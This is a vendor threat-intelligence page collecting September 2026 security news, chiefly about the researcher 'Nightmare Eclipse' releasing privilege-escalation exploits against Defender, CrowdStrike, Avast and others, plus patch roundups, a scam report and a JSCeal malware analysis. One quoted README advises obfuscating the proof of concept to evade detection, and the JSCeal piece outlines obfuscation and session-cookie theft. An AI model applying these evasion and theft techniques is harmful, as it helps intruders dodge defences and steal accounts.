Search/avast
Known CVEs
0
Highest CVSS
In KEV
0
Vendor
antivirus
Connections
102 relationships
New ‘ShieldCrash’ Zero-Day Exploit Targets Microsoft Defender
The security researcher known as Nightmare Eclipse has released another Microsoft Defender zero-day exploit, right after Microsoft’s record-breaking September 2026 patches. Dubbed ‘ShieldCrash’, the exploit targets fully patched Windows systems for privilege escalation. The proof-of-concept (PoC) exploit code demonstrates an arbitrary file read with System privileges, according to Nightmare Eclipse, also known as Chaotic Eclipse, Infinite Nightmare, and MSNightmare. However, the underlying vulnerability can be exploited to gain full System privileges, allowing attackers to drop the SAM database, the researcher says. Nightmare Eclipse also notes that the fresh zero-day is a bypass for ShieldBreak, the Microsoft Defender privilege escalation exploit dropped on the August 2026 Patch Tuesday. ShieldBreak in turn was released as a bypass for Microsoft’s patches against RoguePlanet, a race condition bug dropped as a zero-day on June 2026 Patch Tuesday. Microsoft patched RoguePlanet (CVE-2026-50656) on July 19. It acknowledged ShieldBreak on August 14 and rolled out fixes for it on September 3. The bug is tracked as CVE-2026-69414. Nightmare Eclipse says that Microsoft’s patches for ShieldBreak are incomplete, and that the security defect can still be exploited, releasing ShieldCrash as proof. SecurityWeek has emailed Microsoft for a statement on the fresh zero-day exploit and will update this article if the company responds. According to SOCRadar CISO Ensar Seker, ShieldCrash raises concerns mainly because it exposes a weakness in Microsoft’s patching of the underlying vulnerability’s attack paths. “When researchers can bypass successive fixes for RoguePlanet and ShieldBreak, it suggests the underlying security boundary or attack surface may require a more comprehensive redesign rather than another narrowly targeted patch,” Seker said. He advises security teams to monitor Microsoft’s guidance and Defender intelligence updates, enable tamper protections, restrict admin access and local execution paths, and look for any suspicious process behavior associated with Defender-related mechanisms. “Microsoft should also assess the complete vulnerability class and related code paths, not only the specific condition demonstrated by this latest proof of concept,” Seker added. Related: Nightmare Eclipse Drops CrowdStrike, Nvidia, Avast Zero-Day Exploits Related: Microsoft Patches Record 974 Vulnerabilities, Including Two Exploited Zero-Days Related: Android’s September 2026 Updates Patch 180 Vulnerabilities Related: Adobe Patches Over 170 Vulnerabilities, Including Commerce Zero-Day
securityweek.comSep 10, 2026extracted
Serial Microsoft 0-day hunter drops yet another Defender exploit
SYSTEMS d-Matrix drinks the Nvidia Kool-Aid with NVLink Fusion and MGX rack designsAI infrastructure startup joins Qualcomm, Arm, Marvell, Amazon, Fujitsu, and MediaTek as NVLink true believers ai and ml Anthropic reveals fourth likely crime committed by its AIClaude's Felony Bench rap sheet is now as long as OpenAI's SYSTEMS Samsung to help fortify OpenAI's semiconductor supply chainSemiconductor supply chains are hard, but Samsung offers OpenAI relief in many forms spanning compute and memory AI+ML Google DeepMind rises above the AI scrum with genome atlasSee, AI can be used for good ... or at the very least, a useful distraction from the bad AI and ML Amazon ropes Qualcomm into something, something AI, networking chipsMulti-generation chip collab is more buzzwords than compute Security Russians are posing as Signal support to launch phishing attacksPLUS: US takes down Iranian propaganda sites; Marketing company asks 'Why Do We Have Your Information?' And more! Security Microsoft patches failed to fix on-prem SharePoint, which is now under zero-day attackPLUS: China upgrades smartphone surveillance tools; Ring eases anti-snooping stance; and more Black Hat and DEF CON DEF CON Franklin project enlists hackers to harden critical infrastructureVoting village reports have been so successful, says Jeff Moss, that the whole of DEF CON will now be included Security EQT buys majority share in Swiss cybersecurity biz AcronisWent at equivalent of $3.5B+ valuation for entire firm, though portion sold not specified Malware Month Ten years since the first corp ransomware, Mikko Hyppönen sees no end in sightOn the plus side, infosec's a good bet for a long, stable career Switzerland tests a FOSS escape route from Microsoft 365Swiss Army sticks a knife in American cloud apps with its own FOSS push Feel peak Windows was 7? You might like Kumander LinuxDebian and Xfce – solid, sensible choices – with a pretty skin Canonical shuttering some of its legacy chat channelsThe Ubuntu Pastebin went in June, IRC gets demoted next Audacity audio-editing app no longer looks like it's from the early 2000sThe FOSS tool for audio editing has a fresh coat of paint, and new features to boot Haiku OS rises / Beta 6 sails open web / Virtual winds fly fastA real alternative to running some kind of FOSS Unix clone Offshoots of cancelled TrueNAS Core upgrade to FreeBSD 15Exeunt zVault stage right; enter FreeCORE and BSDnas
theregister.comSep 9, 2026extracted
Avast Premium Security sconta del 60% il piano per 10 dispositivi: protezione completa contro ransomware e deepfake
Il piano Avast Premium Security per 10 dispositivi viene proposto a 39,99 euro per il primo anno, contro un prezzo di rinnovo indicato in 99,99 euro. L’offerta di Avast consente di proteggere PC Windows, Mac, smartphone Android e iPhone/iPad e include inoltre una garanzia di rimborso entro 30 giorni. La promozione di Avast punta a ridurre il costo iniziale della protezione per nuclei familiari e utenti con più dispositivi, concentrandosi sulle principali minacce digitali, dalle infezioni malware alle truffe basate sull’intelligenza artificiale. Indice degli argomenti Il principale elemento economico dell’offerta di Avast è il numero di dispositivi coperti. Il piano consente di utilizzare la protezione su un massimo di 10 apparecchi, senza limitarsi a una singola piattaforma. La copertura comprende Windows, macOS, Android e iOS. Questo permette di concentrare più dispositivi sotto un unico abbonamento, invece di acquistare protezioni separate. Sul fronte antivirus, il pacchetto blocca virus e malware e aggiunge una difesa specifica contro il ransomware. Quest’ultimo può cifrare i dati presenti sul dispositivo e chiedere un riscatto per ripristinarne l’accesso. La componente anti-truffa amplia la protezione oltre il semplice malware. L’Assistente Avast aiuta a individuare possibili truffe online, mentre gli strumenti dedicati segnalano contenuti e comunicazioni fraudolente. Il sistema affronta anche una minaccia sempre più rilevante: i deepfake. L’offerta consente di identificare video falsi e contenuti manipolati, aggiungendo un controllo ulteriore durante la navigazione. Sono inoltre previste funzioni per bloccare SMS e chiamate fraudolente. La protezione comprende anche i siti di phishing, i portali contraffatti e quelli considerati non sicuri. Un’altra funzione riguarda la verifica della sicurezza delle reti Wi-Fi. Il controllo consente di individuare potenziali rischi quando il dispositivo si collega a una rete. Premium Security interviene anche contro gli attacchi con accesso remoto al PC. Questa difesa riduce il rischio di intrusioni ottenute attraverso tecniche che consentono a soggetti esterni di controllare il computer. Il vantaggio economico dell’offerta di Avast emerge dal confronto tra il prezzo promozionale e quello indicato per il rinnovo. La tariffa iniziale di 39,99 euro equivale a circa 3,33 euro al mese nel primo anno. Il dato più rilevante riguarda quindi il piano multi-dispositivo. Con 39,99 euro nel primo anno, il costo medio scende a circa 4 euro per dispositivo, considerando tutti i 10 dispositivi disponibili. La tariffa promozionale riguarda il primo anno. Il prezzo indicato per il rinnovo successivo è di 99,99 euro all’anno, elemento da valutare prima della sottoscrizione. La proposta comprende inoltre la garanzia di rimborso entro 30 giorni.
cybersecurity360.itSep 9, 2026extracted
Researcher Drops New Microsoft Defender PoC Showing ShieldBreak Patch Can Be Bypassed
The security researcher known as Chaotic Eclipse has dropped a proof-of-concept (PoC) for yet another zero-day in Microsoft Defender. The vulnerability, codenamed ShieldCrash, is assessed to be a patch bypass for CVE-2026-69414 (CVSS score: 7.8), also called ShieldBreak, which the researcher reported last month. "Microsoft has failed to properly patch ShieldBreak CVE-2026-69414," Chaotic Eclipse said. "Under specific conditions it is still possible to trigger the exact same problem that was caused by ShieldBreak. While Microsoft fixed several things to prevent re-exploiting the issue, they missed a spot where ShieldBreak can still be exploited." The PoC demonstrates an arbitrary file read as SYSTEM with the latest version of Windows installed. All supported versions of the desktop operating system are said to be impacted. The development comes days after Redmond shipped an update to the Microsoft Malware Protection Engine to plug CVE-2026-69414. The issue has been patched in Malware Protection Engine version 1.1.26080.3. It does not require any customer action and does not affect systems that have disabled Microsoft Defender. "In response to a constantly changing threat landscape, Microsoft frequently updates malware definitions and the Microsoft Malware Protection Engine," the tech giant said. "In order to be effective in helping protect against new and prevalent threats, antimalware software must be kept up to date with these updates in a timely manner." "For enterprise deployments as well as end users, the default configuration in Microsoft antimalware software helps ensure that malware definitions and the Microsoft Malware Protection Engine are kept up to date automatically. Product documentation also recommends that products are configured for automatic updating." In recent weeks, Chaotic Eclipse has also released PoC exploits for four vulnerabilities impacting CrowdStrike Falcon Sensor (FalconFlank), Kaspersky (HardBreacher), Avast Antivirus (PrettyPrague), and NVIDIA (GreenSection). Both HardBreacher and PrettyPrague have since been patched by the respective security vendors, while CrowdStrike told The Hacker News that it's investigating the report.
thehackernews.comSep 9, 2026extracted
Adobe Patches Over 170 Vulnerabilities, Including Commerce Zero-Day
Adobe has released patches for more than 170 vulnerabilities across its products, including urgent hotfixes for a critical-severity flaw in Adobe Commerce and Magento Open Source that has been exploited in the wild as a zero-day. Tracked as CVE-2026-75650 (CVSS score of 10/10), the flaw is a code injection issue that can be exploited without authentication for remote code execution (RCE). “Adobe is aware of CVE-2026-75650 being exploited in the wild,” the company notes in its advisory. Adobe also published a KB article with details on the update. The security defect was patched on Monday, after cybersecurity firm Sansec warned over the weekend that hackers have been exploiting a zero-day flaw in Commerce/Magento to hack online stores. Attackers started exploiting the issue, dubbed StyleSmuggler, on September 4, injecting code that would be executed by triggering Magento’s standard ‘Payment Transaction Failed Reminder’, without user interaction. According to Sansec’s updated report, several threat actors have been targeting the vulnerability to deploy backdoors and web shells. Commerce/Magento should apply Adobe’s fixes as soon as possible and rotate their encryption keys and all credentials protected with those keys, including administrative passwords, database credentials, integration tokens, OAuth secrets, SSH and deploy keys, and API keys. “Rotate those at the source, not only inside Magento. Rotating the encryption key on its own does not invalidate anything an attacker already read,” Sansec notes. On Tuesday, Adobe released patches for eight additional Commerce vulnerabilities, including two critical-severity privilege escalation flaws and six high-severity security bypass and privilege escalation bugs. The company also released urgent patches for CVE-2026-82004 (CVSS score of 10/10), an OS command injection defect in Campaign Classic leading to arbitrary code execution. Fresh ColdFusion security updates were also assigned a priority 1 rating, as they address two critical-severity code execution security weaknesses: CVE-2026-48273 (CVSS score of 9.9/10) and CVE-2026-75746 (CVSS score of 9.1/10), and seven high- and medium-severity issues. Adobe recommends that all priority 1 updates be applied within three days after they were released. On Tuesday, Adobe also rolled out fixes for 107 vulnerabilities in Experience Manager, 32 flaws in Acrobat Reader, 8 in Photoshop, 3 in Illustrator, and 1 in Animate. Fixes were also rolled out for Photoshop Mobile. Adobe says it is not aware of any of the newly resolved vulnerabilities being exploited in attacks, aside from the Commerce/Magento zero-day. Additional information can be found on Adobe’s security advisories page. Related: SAP Patches Critical Extended Passport Processing Vulnerability Related: MikroTik Patches Critical Flaws Chained to Hack Routers Related: N-able Patches Critical Zero-Day in N-central Related: Nightmare Eclipse Drops CrowdStrike, Nvidia, Avast Zero-Day Exploits
securityweek.comSep 8, 2026extracted
SAP Patches Critical Extended Passport Processing Vulnerability
SAP released 20 new and updated security notes on Tuesday, including one that resolves a critical-severity memory corruption vulnerability. Tracked as CVE-2026-44756 (CVSS score of 10/10), the critical bug is described as a memory corruption issue in Extended Passport (EPP) Processing. Missing boundary validations during the deserialization of EPP data could trigger unsafe memory behavior during the processing of externally supplied length fields, application security firm Onapsis explains. Dubbed OVERPASS, the security defect can be exploited by unauthenticated attackers to run arbitrary system commands, recover database credentials and password hashes, read the live sessions of logged-in users, and modify data, including configurations and SAP binaries. According to Onapsis, the flaw resides in the SAP kernel code and impacts various components, as EPP is used for tracing within multiple SAP applications. Furthermore, it explains that the vulnerability is triggered as soon as a new user session is opened, from client to server, over several communication protocols, and the vulnerable functionality is implemented by default between ABAP systems. “Because EPP is processed as the session opens, every SAP control that decides who may do what, including user locks, roles, authorization objects, and logon policies, is evaluated later than the point where the flaw is reached. None of them is in the attacker’s way,” Onapsis explains. Additionally, it says, the bug can be reached via at least three vectors, including web requests, the SAP GUI protocol, and Remote Function Call (RFC) connections. “The affected components run under the operating system account that owns the SAP installation, so code execution under it is equivalent to owning the SAP system outright,” Onapsis says. SAP products that rely on the vulnerable kernel code include S/4HANA, ERP, Business Suite (ECC), NetWeaver, Web Dispatcher, BW/4HANA, Enterprise Portal, PI/PO, Solution Manager, and others. According to Onapsis, there are no indicators that the vulnerability has been exploited in the wild. SAP makes no mention of its in-the-wild exploitation either. Three other critical flaws were resolved with SAP’s fresh patches: CVE-2026-58240 (missing authentication check in NetWeaver), CVE-2026-76969 (credential disclosure in multitenant applications using Cloud Application Programming Model (CAP)), and CVE-2026-66768 (improper access control in NetWeaver). The missing authentication issue, dubbed S4GET, could allow remote, unauthenticated attackers to register unauthorized components and perform actions without authorization. The bug resides in SAP’s modern kernel, and every S/4HANA 2025 and earlier release is affected, Onapsis says. Five of the security notes released on SAP’s September 2026 security patch day address high-severity flaws in ABAP Developer Tools, Integration Suite, NetWeaver Business Client, NetWeaver, and Commerce Cloud (Search And Navigation). Related: N-able Patches Critical Zero-Day in N-central Related: MikroTik Patches Critical Flaws Chained to Hack Routers Related: Nightmare Eclipse Drops CrowdStrike, Nvidia, Avast Zero-Day Exploits Related: Sangoma Switchvox Vulnerability Exploited in the Wild
securityweek.comSep 8, 2026extracted
N-able Patches Critical Zero-Day in N-central
IT software firm N-able has rolled out an urgent fix for an unauthenticated remote code execution (RCE) vulnerability in its N-central endpoint management platform that has been exploited as a zero-day. Tracked as CVE-2026-86218 (CVSS score of 10/10), the security defect was discovered after N-able patched two other flaws in N-central, namely CVE-2026-86206 and CVE-2026-86207 “This critical zero-day vulnerability, CVE-2026-86218, could allow pre-authenticated access to the N-central server if exploited,” N-able warns. While no action is required for N-central hosted environments, as the patches were deployed server-side, users of on-premises N-central instances should immediately apply the 2026.3 HF4 hotfix, the company says. “Review your logs for scanning activity. We’ve observed scans originating from the IP range 23.234.64.0/18 attempting to exploit this vulnerability. Check your logs for any connections from this range,” N-able also notes. Administrators are also advised to check their deployments for newly created user accounts they don’t recognize. “At this time, we have no confirmations that this vulnerability has been exploited in production environments, but unpatched systems remain at risk,” N-able says. The hotfix for the exploited zero-day supersedes the previously released patches for CVE-2026-86206 and CVE-2026-86207, two bugs that Huntress flagged as potentially chained together in the wild to bypass authentication and compromise N-central production environments. “However, due to limited historical logging available directly on the appliance, we cannot definitively confirm which specific exploit the threat actor used to achieve their compromise, nor can we rule out the use of alternative vulnerabilities,” Huntress said on Saturday. The cybersecurity firm observed attacks targeting N-central’s underlying API and appliance logs starting on September 4, 2026. Related: Nightmare Eclipse Drops CrowdStrike, Nvidia, Avast Zero-Day Exploits Related: Adobe Commerce Zero-Day Exploited to Backdoor Online Stores Related: Modified ScreenConnect Clients Used in Worm-Like Campaign Related: Elementor Pro WordPress Plugin Vulnerability Exploited to Hack Sites
securityweek.comSep 8, 2026extracted
Il capo ti scrive su WhatsApp: «È un affare segreto». Ma dietro c’è una truffa da 626mila euro
«Non dirlo a nessuno, stiamo acquistando un’azienda». È così che appare la nuova trappola aziendale in cui i truffatori non hanno bisogno né di malware né di email hackerate. L’attacco inizia con un normale messaggio su WhatsApp da parte di un presunto dirigente e finisce con la richiesta di inviare segretamente centinaia di migliaia di euro all’estero. Lo schema è stato scoperto dopo un tentativo di attaccare il dipartimento legale di Gen Digital. A un dipendente, che i ricercatori hanno chiamato David, ha scritto una persona con il nome e la foto di un vero dirigente dell’azienda. Anche il numero sembrava plausibile e corrispondeva al paese in cui lavorava il direttore. A insospettire fu il telefono sconosciuto e una breve chiamata che ha distrutto definitivamente la copertura : la voce del interlocutore non corrispondeva a quella del vero collega. David capì di avere a che fare con dei truffatori, ma continuò la conversazione insieme ai ricercatori. Nella chat apparve un secondo partecipante che si spacciava per un vero esperto . Alla vittima fu chiesto di passare alla posta privata e poi le fu inviato un accordo di non divulgazione (NDA) professionalmente redatto. Il falso NDA vietava di discutere l’acquisizione presunta con i colleghi e richiedeva di condurre tutta la corrispondenza tramite WhatsApp e un indirizzo privato. Così i truffatori hanno trasformato uno dei principali segnali di allarme in parte della loro copertura. Il divieto di rivolgersi a legali, finanziari e altri dipendenti non appariva più come una richiesta sospetta, ma come una condizione obbligatoria per l’affare segreto. Per rendere la storia più credibile, i criminali hanno utilizzato informazioni reali sulla storia di Gen Digital, inclusa l’acquisizione di Avast da parte di NortonLifeLock nel 2022. Dopo la preparazione, arrivò la richiesta principale. Avast Software avrebbe dovuto trasferire €626.735,45 a nome di NortonLifeLock Ireland Limited a una società di Hong Kong come anticipo per servizi professionali. Poi il criminale chiese un messaggio bancario SWIFT MT103 e il numero UETR per assicurarsi che il trasferimento internazionale fosse stato effettivamente inviato e potesse essere tracciato. I ricercatori, invece dei soldi, prepararono documenti bancari falsi e un link con un marcatore che registrava gli accessi. In 24 giorni, il link ha ricevuto 49 richieste HTTP da 43 indirizzi IP. Una parte significativa degli accessi è stata creata da scanner automatici e servizi cloud, ma dopo la filtrazione rimasero visite manuali ripetute tramite VPN , proxy e reti normali. Non è stato possibile determinare la posizione o le identità degli organizzatori con questi dati. Dall’analisi del falso NDA, il team ha trovato altre quattro vittime tra dirigenti e specialisti del settore degli investimenti diretti, del finanziamento industriale, delle vendite, dell’estrazione mineraria e dell’energia. I documenti utilizzavano i marchi PwC, KPMG e Ogier, anche se non ci sono stati segni di hackeraggio o coinvolgimento di queste aziende. Cambiavano i nomi e le storie, ma la struttura dei documenti, le formulazioni e persino un insolito identificatore numerico si ripetevano. La campagna ha preso il nome di Phantom Deal . Per meccanismo, la truffa è simile a BEC-атакам, ma i criminali evitano deliberatamente la posta aziendale. La protezione del server di posta qui è poco utile, poiché lo strumento principale dei truffatori è la fiducia nel dirigente, la pressione della segretezza e il tentativo di far uscire il dipendente dal processo abituale di approvazione. Gen Digital consiglia di confermare le disposizioni finanziarie attraverso un canale indipendente noto in anticipo e di non permettere nemmeno ai dirigenti di annullare i controlli di pagamento con il riferimento alla riservatezza dell’affare. L'articolo Il capo ti scrive su WhatsApp: «È un affare segreto». Ma dietro c’è una truffa da 626mila euro proviene da Red Hot Cyber .
redhotcyber.comSep 8, 2026extracted
Nightmare Eclipse Drops CrowdStrike, Nvidia, Avast Zero-Day Exploits
The security researcher known as Nightmare Eclipse has dropped three zero-day exploits targeting products from Avast, CrowdStrike, and Nvidia. Also known as Chaotic Eclipse, Infinite Nightmare, and MSNightmare, the security researcher came to fame for a series of zero-day exploits targeting Microsoft’s products, but has recently moved to other vendors as well. In late August, Nightmare Eclipse released a privilege escalation zero-day in a Kaspersky endpoint security product. Dubbed HardBreacher, the exploit has been patched by Kaspersky on August 31. Within a short window last week, Nightmare Eclipse dropped three new zero-day exploits, dubbed PrettyPrague, FalconFlank, and GreenSection. The PrettyPrague proof-of-concept (PoC) code, the researcher says, targets the Avast sandbox to spawn a shell with full system privileges, and may also affect other GenDigital products, including AVG and Norton. “Gen was recently made aware of a security vulnerability affecting a subset of Gen products, including Avast Antivirus, that could allow an attacker to elevate their system privileges. We immediately initiated our security response procedures and have fixed the issue. We take all security matters seriously and encourage users to keep their products up to date to ensure they are protected,” a GenDigital spokesperson said, responding to a SecurityWeek inquiry. FalconFlank exploits a bug in the Office malicious macros remediation feature of CrowdStrike Falcon Sensor for privilege escalation, the researcher says. “We are actively investigating these claims and advise customers to disable the Microsoft Office File Suspicious Macro Removal Windows policy setting. Customers remain protected through the Cloud Anti-malware for Microsoft Office Files settings. We refer customers to the FalconFlank Tech Alert in the CrowdStrike support portal,” CrowdStrike told SecurityWeek. The GreenSection exploit, Nightmare Eclipse says, targets an out-of-bounds memory write affecting a shared global memory section used by multiple Nvidia user-mode components. “While this bug does not get SYSTEM privileges immediately, it can be used cross user to user boundary easily or even compromise the dwm.exe process. I didn’t look deeply into it, but I’d be happy to see someone making a full exploit out of it,” Nightmare Eclipse notes. “We are aware of reports describing a proof-of-concept that demonstrates improper access controls on a shared memory section used by certain NVIDIA GPU display driver components on Windows. NVIDIA is reviewing the reported behavior through our established security and product engineering processes. NVIDIA takes reports of this nature seriously and is actively investigating to determine the root cause, affected configurations, and appropriate remediation,” an Nvidia spokesperson said. Security researcher Kevin Beaumont said late last week that the Avast, CrowdStrike, and Kaspersky exploits work. *updated with statement from Nvidia Related: VMware Workstation and Fusion Updates Patch Critical Vulnerability Related: Google Patches 6th Chrome Zero-Day of 2026 Related: Over 3 Million WordPress Sites Affected by Migration Plugin Vulnerability
securityweek.comSep 7, 2026extracted
Researcher Publishes CrowdStrike Privilege Escalation Zero Day
A security researcher has published details of what appears to be a zero-day privilege escalation exploit in CrowdStrike. The individual, identified by their online moniker “Nightmare Eclipse” (aka Infinite Nightmare, MSNightmare) posted the details to GitHub on September 3. “FalconFlank is a zero-day privilege escalation that abuses the Office malicious macros remediation in CrowdStrike Falcon Sensor. Obviously by the time I drop this CrowdStrike would already have detections for it so if you want to test you either have to add it to the exclusions or obfuscate the PoC and change the dll load technique,” they wrote. “As of now it works in a fully updated Windows 11 25H2 / Windows Server 2025 with CrowdStrike Falcon – Phase 3 Optimal Protection + needs ‘Microsoft Office file malicious macro removal’.” A statement from CrowdStrike urged customers to disable the Microsoft Office File Suspicious Macro Removal Windows policy setting while the firm investigates the case. "Customers remain protected through the Cloud Anti-malware for Microsoft Office Files settings,” it added. “We refer customers to the FalconFlank Tech Alert in the CrowdStrike support portal." That portal is only accessible for customers with a dedicated account, and there has not yet been a CVE assigned to the bug. The Nightmare Continues Security researcher Kevin Beaumont confirmed that FalconFlank works, while also highlighting that the same researcher also published zero-days exploiting Kaspersky and Avast. “An open secret amongst security researchers is most cybersecurity products are crap at cybersecurity,” he wrote on Mastadon. “From VPN products being one of the top causes of ransomware group entry, ../.. path traversal bugs, EDR products which brick PCs and are trivial to bypass and exploit etc.. It's a wild world out there.” Oliver Spence, CEO of CybaVerse, agreed that security products can themselves be a risk to organizations. “How do we fix this? Vendors need to take greater responsibility for ensuring their products are secure, continually testing for weaknesses and remediating vulnerabilities quickly,” he argued. “Otherwise, customers will continue to face the financial and operational penalties of these weaknesses in the very products they depend on to secure them.” NightmareEclipse was previously responsible for the “Exploitarium” dump of over 30 proof-of-concept exploits in open source projects, including the Linux kernel, Libssh2, FFmpeg, Gogs, and Gitea. Infosecurity has reached out to CrowdStrike for additional comment.
infosecurity-magazine.comSep 7, 2026extracted
JSCeal Malware Can Bypass Google Authentication Using Stolen Session Cookies
Cybersecurity researchers have unpacked JSCeal, a sophisticated compiled V8 JavaScript (JSC) malware with credential harvesting, surveillance, and traffic-interception capabilities. "The payloads are protected with javascript-obfuscator, using multiple techniques including RC4-protected strings, control-flow flattening, proxy functions, and operation wrappers," Check Point Research said in a technical report published last week. JSCeal was first documented by Check Point in July 2025, highlighting the threat actors' use of fake cryptocurrency trading sites to which unsuspecting users are redirected via malicious ads on Facebook and Google. The counterfeit sites instruct them to download bogus installers for TradingView that lead to the deployment of the malware. The activity overlaps with a threat cluster tracked under the monikers WEEVILPROXY and MeadowLocust. Malvertising campaigns distributing the malware make use of two ZIP archives delivered via PowerShell: one containing the Node.js runtime and the other containing the main payload and other auxiliary components. As recently as last month, ad security platform Confiant disclosed details of a massive malvertising operation codenamed SourTrade, which has been observed impersonating trusted trading and cryptocurrency brands, such as Solana, Luno, and TradingView, to serve lookalike portals with malicious JavaScript that instructs web browsers to assemble malware directly in memory. The campaign is assessed to be active since late 2024, targeting retail traders and cryptocurrency investors across 12 countries in 25 languages, primarily in Asia Pacific and Latin America. Evidence indicates that the campaign overlaps with a JSCeal campaign described by Bitdefender in September 2025. "What makes SourTrade technically distinct is what happens on its landing page," Confiant said. "It does not distribute finished malware. Instead, it delivers assembly instructions to the victim's browser, retrieves a clean legitimate file from separate infrastructure, and directs the browser to build the final malware in memory on the victim’s machine. No finished malware ever exists on the network." JSCeal is protected using javascript-obfuscator, with the operators repeatedly using four groups of transformations to obscure the malware. These include - Replacing function and variable names with short or nonsensical identifiers Splitting important strings into chunks (which are subsequently encoded and RC4-protected) and then reconstructing them through decoder functions Using control-flow flattening to turn program flow into a flat, single-level switch statement controlled by an infinite loop and a state variable with the goal of making analysis and reverse‑engineering harder Forwarding function calls through proxy helpers and wrapping simple operations, like addition, subtraction, comparison, or function invocation, in dedicated helper functions The Israeli cybersecurity company said it developed a "fully static deobfuscation pipeline" to decode compiled V8 JavaScript bytecode protected with the utility, thereby offering insights into the malware's execution flow and its features, counting its ability to enumerate installed browsers, and query saved secrets, cookies, OAuth tokens, and other data from them, as well as "router" functions that register handlers for the collected information. The browser stealing module targets a long list of Chromium-based browsers, such as Google Chrome, Microsoft Edge, Brave, Opera, Opera GX, Avast Secure Browser, Vivaldi, and Cốc Cốc. For each browser, the malware navigates to the expected location of its user-data directory and lists available profiles, from where cookies and passwords are extracted. What's more, JSCeal is equipped to leverage the stolen cookie data to reconstruct a browser session and conduct active session replay attacks to bypass authentication and gain unauthorized access to a victim's Google account. A second module embedded within the malware offers surveillance capabilities by recording keystrokes and taking screenshots. "A common technique used by banking trojans is to install a local proxy and inject or modify web content in selected services," Check Point said. "JSCeal follows a similar pattern: the recovered code shows proxy setup, certificate generation and installation, and service-specific request and response modification." "The proxy is not limited to passive interception. The recovered code contains dedicated handlers that modify selected requests and responses for specific services. A configuration function exposes separate overrides for Binance, Bybit, and Ledger, as well as generic handlers for replacing HTML, blocking hosts, and clearing selected cookies." There also exist multiple handlers specifically focused on cryptocurrency platforms, one of which captures account data and records cryptocurrency balances. "JSCeal combines two forms of analysis friction: a version-specific compiled V8 format and several layers of JavaScript obfuscation applied before compilation. Neither makes the malware impossible to reverse, but together they move it outside the workflows that analysts normally rely on," security researcher Aleksandra "Hasherezade" Doniec said. "Taken together, these developments show that the JSCeal authors are investing both in making the payload harder to analyze and in broadening its platform coverage. With campaigns continuing into recent months, the changes indicate that JSCeal remains under active development."
thehackernews.comSep 7, 2026extracted
New CrowdStrike 'FalconFlank' zero-day grants SYSTEM privileges
An anonymous security researcher who uses the "Nightmare Eclipse" handle released a CrowdStrike Falcon zero-day exploit named "FalconFlank" that lets attackers escalate privileges on up-to-date Windows systems. Nightmare Eclipse says the new vulnerability (which has yet to be assigned a CVE ID) affects devices running the latest versions of Windows 11 and Windows Server, as well as CrowdStrike's endpoint security platform. Successful exploitation allows attackers to spawn a command prompt with SYSTEM privileges by abusing CrowdStrike Falcon's Office malicious macros remediation feature. "FalconFlank is a 0day privilege escalation that abuses the office malicious macros remediation in Crowdstrike Falcon Sensor, obviously by the time I drop this Crowdstrike would already have detections for it so if you want to test you either have to add it to the exclusions or obfuscate the PoC and change the dll load technique," Nightmare Eclipse said. "As of now it works in a fully updated windows 11 25H2 / Windows Server 2025 with Crowdstrike Falcon." When BleepingComputer asked for more details about this vulnerability, a CrowdStrike spokesperson said the company is investigating the researcher's claims and advised customers to disable the Microsoft Office Windows policy setting that toggles the security software's File Suspicious Macro Removal feature. "We are actively investigating these claims and advise customers to disable the Microsoft Office File Suspicious Macro Removal Windows policy setting," the spokesperson told BleepingComputer. "Customers remain protected through the Cloud Anti-malware for Microsoft Office Files settings. We refer customers to the FalconFlank Tech Alert in the CrowdStrike support portal." Although the company also shared this link to the tech alert regarding the FalconFlank zero-day exploit, the advisory is not public, and customers can access it only if they have an account on CrowdStrike's support portal. CrowdStrike has yet to reply to a second email asking for a copy of the FalconFlank tech alert and whether a CVE ID has been assigned to the FalconFlank flaw. Kaspersky, Avast, Nvidia, and Microsoft zero-days This week, Nightmare Eclipse has also released privilege escalation zero-day exploits for Kaspersky Antivirus for Endpoint (named HardBreacher) and GenDigital Avast Antivirus (PrettyPrague), as well as a denial-of-service zero-day for Nvidia (named GreenSection) that will crash the system. Cybersecurity expert Kevin Beaumont confirmed on Thursday that the privilege escalation exploits released by Nightmare Eclipse this week are real and work. Nightmare Eclipse has also disclosed multiple zero-day exploits targeting multiple Microsoft products since April, including Microsoft Defender, BitLocker, and various other Windows components. These Microsoft zero-days are known as LegacyHive, RoguePlanet, BlueHammer, RedSun, YellowKey, GreenPlasma, MiniPlasma, and UnDefend. While the LegacyHive, RoguePlanet, YellowKey, GreenPlasma, and MiniPlasma flaws have since been fixed, the other security flaws remain zero-days and are still awaiting an official patch. After Nightmare Eclipse disclosed the first zero-days, Microsoft responded with warnings of legal action against people engaging in "malicious activity causing real harm to our customers," prompting many to believe that the company was directly threatening the security researcher. Overall prevention scores can hide what happens after initial access. Once attackers are using valid credentials, prevention drops sharply. The Blue Report 2026 measures defenses technique by technique across 338 million simulations run in customer production environments. Get the report
bleepingcomputer.comSep 4, 2026extracted
Prolific Microsoft 0-day hunter drops CrowdStrike Falcon exploit PoC
The disgruntled security researcher known as Nightmare Eclipse (aka Chaotic Eclipse, Infinite Nightmare, and now also MSNightmare) is moving away from their singular Microsoft vendetta and on to other vendors. On Thursday, they dropped a new zero-day bug called FalconFlank that affects CrowdStrike’s Falcon endpoint security platform - albeit with a Windows link. According to the prolific zero-day hunter, FalconFlank is a privilege escalation vulnerability that abuses the Microsoft Office malicious macros remediation feature in CrowdStrike Falcon. This is an automated security tool built into the platform that inspects Microsoft Office documents. If it finds any potentially harmful macros, the feature strips the suspect code and - hopefully - prevents malicious code or other dangerous payloads from executing when users open the document. “We are actively investigating these claims and advise customers to disable the Microsoft Office File Suspicious Macro Removal Windows policy setting,” a CrowdStrike spokesperson told The Register. “Customers remain protected through the Cloud Anti-malware for Microsoft Office Files settings. We refer customers to the FalconFlank Tech Alert in the CrowdStrike support portal.” The proof-of-concept (PoC) exploit works on fully updated Windows 11 25H2 and Windows Server 2025 systems running CrowdStrike Falcon with Phase 3 - Optimal Protection as well as the malicious macro removal feature enabled, Nightmare Eclipse said in a GitHub README. “Obviously by the time I drop this Crowdstrike would already have detections for it so if you want to test you either have to add it to the exclusions or obfuscate the PoC and change the dll load technique,” they wrote. Security sleuth Kevin Beaumont confirmed this exploit works, along with several others Nightmare released over the past week. Beaumont told us that he’s not surprised to see Nightmare digging into other, non-Microsoft zero-days. “Kinda makes sense they’d branch out to other vendors as there’s problems across the endpoint security space with the quality of the security products in terms of…security unfortunately,” Beaumont told The Register. “Hopefully it causes cybersecurity vendors to up their game, stop hyping hypothetical AI attacks, and instead make their own products secure for customers.” FalconFlank follows other vulnerabilities in various endpoint and antivirus products that Nightmare has found and published in the last several days. These include HardBreacher, an elevation of privileges 